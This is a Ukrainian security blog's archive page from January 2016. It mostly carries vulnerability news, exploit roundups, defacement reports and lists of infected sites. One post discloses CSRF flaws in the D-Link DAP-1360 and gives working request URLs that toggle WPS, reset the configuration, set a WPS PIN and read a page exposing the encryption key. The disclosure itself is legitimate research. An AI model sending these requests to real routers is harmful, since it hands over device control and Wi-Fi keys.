Архів за Січень, 2016

Уразливості в Microsoft Exchange Server

20:15 28.01.2016

Виявлені уразливості безпеки в Microsoft Exchange Server.

Уразливі продукти: Microsoft Exchange Server 2013, Microsoft Exchange Server 2013 SP1, Microsoft Exchange Server 2016.

Підробка вмісту, зокрема підробка адреси в Outlook Web Access.

  • Microsoft Security Bulletin MS16-010 - Important Security Update in Microsoft Exchange Server to Address Spoofing (3124557) (деталі)

Добірка уразливостей

17:21 28.01.2016

В даній добірці уразливості в веб додатках:

  • ClassLoader manipulation issue confirmed for Struts 1 (деталі)
  • Struts 1 - Mitigation Advice Available, Possible RCE Impact (деталі)
  • drupal7 security update (деталі)
  • Multiple SQL Injection in SP Client Document Manager plugin (деталі)
  • Struts 2.3.16.3 GA release available - security fix (деталі)

Вийшли Mozilla Firefox 43.0.1 і 43.0.2

23:57 27.01.2016

У грудні, 18.12.2015, вийшов Mozilla Firefox 43.0.1, а 22.12.2015 вийшов Mozilla Firefox 43.0.2. Нові версії браузера вийшли через декілька днів після виходу Firefox 43.

Це багфікс і секюріті випуски в яких зроблене покращення і виправлена уразливість. У версії 43.0.1 зроблена підготовка до використання SHA-256 підписуючих сертифікатів для Windows версій браузера. У версії 43.0.2 використаний SHA-256 сертифікат для Windows версій браузера. Також виправлена одна уразливість в Firefox 43.0.2 і Firefox ESR 38.6.

  • MFSA 2015-150 MD5 signatures accepted within TLS 1.2 ServerKeyExchange in server signature (деталі)

Четвертий масовий взлом сайтів на сервері Hvosting

22:43 27.01.2016

Відбувся четвертий масовий взлом сайтів на сервері Hvosting. Він тривав на протязі 2010-2015 років: з 05.04.2010 до 03.07.2015. Третій масовий взлом сайтів на сервері Hvosting відбувся раніше.

Був взломаний сервер української компанії Hvosting. Взлом складався з двох масових дефейсів та багатьох окремих дефейсів. Вони відбулися паралельно до масового взлому сервера Ukraine.

Всього було взломано 40 сайтів на сервері хостера Hvosting (IP 91.200.40.32). Перелік сайтів можете подивитися на www.zone-h.org.

З зазначених 40 сайтів 8 сайтів були взломані хакером HighTech, 7 сайтів хакером jangene_cakep та інші сайти різними хакерами.

Масові дефейси хакерами HighTech і jangene_cakep явно були зроблені через взлом серверу хостінг провайдера. У випадку окремих дефейсів по одному або декілька сайтів, всі вони явно були зроблені при взломах окремих сайтів. Але також можлива атака на інші сайти на даному сервері через взлом одного сайту та використання уразливостей в програмному забезпеченні сервера.

Нові CSRF уразливості в D-Link DAP-1360

20:09 27.01.2016

Продовжуючи тему уразливостей в D-Link DAP-1360. У квітні, 30.04.2014, я виявив Cross-Site Request Forgery уразливості в D-Link DAP-1360 (Wi-Fi Access Point and Router).

CSRF (WASC-09):

В розділі Wi-Fi - WPS можна змінити параметр WPS Enable:

Увімкнути:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=106&res_struct_size=0&res_buf={%22wps%22:{%22WscEnable%22:true,%22WscConfigured%22:true}}

Вимкнути:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=106&res_struct_size=0&res_buf={%22wps%22:{%22WscEnable%22:false,%22WscConfigured%22:true}}

Можна відмінити конфігурацію (Reset to unconfigured):

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=106&res_struct_size=0&res_buf={%22wps%22:{%22WscEnable%22:true,%22WscConfigured%22:false}}

Можна прочитати дані про конфігурацію в Information - Refresh. Через XSS атаку з цієї сторінки можна отримати дані про ключ Encryption key (це спрацює навіть при вимкненому WPS):

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_config_action=1&res_config_id=35&res_struct_size=0

Можна змінити метод в Connection - WPS Method:

PBC:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=107&res_struct_size=0&res_buf={%22wps%22:{%22WscEnable%22:true,%22WscMethod%22:%22PBC%22}}

PIN:

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=107&res_struct_size=0&res_buf={%22wps%22:{%22WscEnable%22:true,%22WscMethod%22:%22PIN%22,%22WscPin%22:%2211111111%22}}

Уразлива версія D-Link DAP-1360, Firmware 1.0.0. Дана модель з іншими прошивками також повинна бути вразливою.

Добірка експлоітів

17:23 27.01.2016

В даній добірці експлоіти в веб додатках:

  • NXFilter 3.0.3 - Multiple XSS Vulnerabilities (деталі)
  • NXFilter 3.0.3 - CSRF Vulnerabilities (деталі)
  • Google AdWords <= 6.2.0 API client libraries - XML eXternal Entity Injection (XXE) (деталі)
  • Idera Up.Time Monitoring Station 7.0 post2file.php Arbitrary File Upload (деталі)
  • D-Link DIR-880L - Multiple Buffer Overflow Vulnerabilities (деталі)

Інфіковані сайти №246

22:44 26.01.2016

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

  • http://gp.gov.ua - інфікований державний сайт - інфекція була виявлена 26.01.2016. Зараз сайт не входить до переліку підозрілих.
  • http://prof-legion.com.ua - інфекція була виявлена 26.01.2016. Зараз сайт входить до переліку підозрілих.
  • http://medsvit.com.ua - інфекція була виявлена 31.12.2015. Зараз сайт не входить до переліку підозрілих.
  • http://2service.com.ua - інфекція була виявлена 31.12.2015. Зараз сайт не входить до переліку підозрілих.
  • http://kino-planeta.com - інфекція була виявлена 26.01.2016. Зараз сайт входить до переліку підозрілих.
  • http://redhost.info - інфекція була виявлена 31.12.2015. Зараз сайт не входить до переліку підозрілих.
  • http://atmedia.com.ua - інфекція була виявлена 26.01.2016. Зараз сайт входить до переліку підозрілих.
  • http://7ba.org - інфекція була виявлена 31.12.2015. Зараз сайт не входить до переліку підозрілих.
  • http://akciiskidki.com - інфекція була виявлена 31.12.2015. Зараз сайт не входить до переліку підозрілих.
  • http://architector.dp.ua - інфекція була виявлена 26.01.2016. Зараз сайт входить до переліку підозрілих.

Виконання коду в Microsoft Silverlight

20:01 26.01.2016

Виявлена можливість виконання коду в Microsoft Silverlight.

Уразливі продукти: Microsoft Silverlight 5 для Windows і Mac до версії 5.1.41212.0.

Виконання коду в браузерах з плагіном Silverlight.

  • Microsoft Security Bulletin MS16-006 - Critical Security Update for Silverlight to Address Remote Code Execution (3126036) (деталі)

Добірка уразливостей

17:28 26.01.2016

В даній добірці уразливості в веб додатках:

  • HP Network Node Manager I (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Unauthorized Access, Execution of Arbitrary Code (деталі)
  • Reflected Cross-Site Scripting (XSS) in Simple Email Form Joomla Extension (деталі)
  • Multiple SQL Injections in Dolibarr ERP & CRM (деталі)
  • Vulnerability in php-ZendFramework (деталі)
  • Struts 2.3.16.2 GA release available - security fix (деталі)

Уразливості в плагінах для WordPress №210

23:54 23.01.2016

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Newsletter, Download Manager, Yoast Google Analytics і темі Daily Edition. Для котрих з’явилися експлоіти.

  • WordPress Newsletter 2.6.x / 2.5.x Open Redirect (деталі)
  • WordPress Download Manager 2.7.2 Privilege Escalation (деталі)
  • WordPress Yoast Google Analytics 5.3.2 Cross Site Scripting (деталі)
  • WordPress Daily Edition 1.6.2 SQL Injection (деталі)
  • WordPress Daily Edition Theme 1.6.2 Cross Site Scripting (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.